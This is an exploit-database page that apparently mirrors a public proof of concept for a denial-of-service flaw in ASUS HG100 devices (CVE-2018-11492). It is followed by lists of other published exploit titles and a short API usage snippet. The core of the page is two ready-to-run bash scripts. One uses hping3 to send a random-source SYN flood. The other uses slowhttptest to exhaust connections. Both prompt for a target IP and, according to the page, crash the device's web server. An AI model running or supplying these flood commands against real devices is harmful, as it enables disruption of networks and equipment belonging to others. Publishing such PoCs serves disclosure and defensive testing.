Menu

Search for hundreds of thousands of exploits

"ASUS HG100 - Denial of Service"

Author

Exploit author

"YinT Wang"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-04-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
# Date: 2019-04-14 # Exploit Author: YinT Wang; 
# Vendor Homepage: www.asus.com 
# Version: Hardware version: HG100 Firmware version:  1.05.12   
# Tested on: Currnet 1.05.12 
# CVE : CVE-2018-11492

1. Description 
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).

2.Proof of Concept
Just Execute the following script in kali which could crash the devices

    1. IPv4 packet and in result of devices crash.which written in linux script.

        #needed to co-operate with hping3 tool
        #with the time period at least 220s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 here " url
        hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
        sleep 220
        echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
        exit 0

    2.Slowhttp test and caused the devices crash.which written in linux script.

        #needed to co-operate with slowhttptest tool
        #with the time period 600s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
        slowhttptest -H -R -c 10000 -l 600 -u $url
        sleep 600
        echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
        exit 0
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-20"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)"webappsphpindoushka
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"Virtual Freer 1.58 - Remote Command Execution"webappsphpSajjadBnd
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-18"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting"webappsphp"Ultra Security Team"
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting"webappsphp"Ashkan Moghaddas"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"LabVantage 8.3 - Information Disclosure"webappsjava"Joel Aviad Ossi"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
Release DateTitleTypePlatformAuthor
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-05"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account"remotehardwareSnawoot
2020-02-05"Wago PFC200 - Authenticated Remote Code Execution (Metasploit)"webappshardware0x483d
2020-02-03"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection"webappshardware"Cosmin Craciun"
2020-01-29"Satellian 1.12 - Remote Code Execution"webappshardwareXh4H
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2020-01-24"Genexis Platinum-4410 2.1 - Authentication Bypass"webappshardware"Husinul Sanub"
2020-01-24"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot"webappshardwarePCEumel
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
2020-01-15"Sagemcom [email protected] 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution"remotehardwareLyrebirds
2020-01-14"IBM RICOH InfoPrint 6500 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH 6400 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-08"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow"remotehardwarehantwister
2020-01-07"piSignage 2.6.4 - Directory Traversal"webappshardware"JunYeong Ko"
2020-01-06"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting"webappshardware"Ismail Tasdelen"
2020-01-01"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal"webappshardware"Raif Berkay Dincel"
2019-12-31"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)"webappshardware"TJ Corley"
2019-12-30"XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)"webappshardware"Ismail Tasdelen"
2019-12-30"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Authentication Bypass"webappshardwareLiquidWorm
2019-12-30"RICOH Web Image Monitor 1.09 - HTML Injection"webappshardware"Ismail Tasdelen"
2019-12-30"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot"webappshardwareLiquidWorm
2019-12-30"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"webappshardwareLiquidWorm
2019-12-30"Heatmiser Netmonitor 3.03 - Hardcoded Credentials"webappshardware"Ismail Tasdelen"
2019-12-30"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)"webappshardware"Ismail Tasdelen"
2019-12-30"XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)"webappshardware"Ismail Tasdelen"
2019-12-30"RICOH SP 4510SF Printer - HTML Injection"webappshardware"Ismail Tasdelen"
Release DateTitleTypePlatformAuthor
2019-04-17"ASUS HG100 - Denial of Service"doshardware"YinT Wang"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46720/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse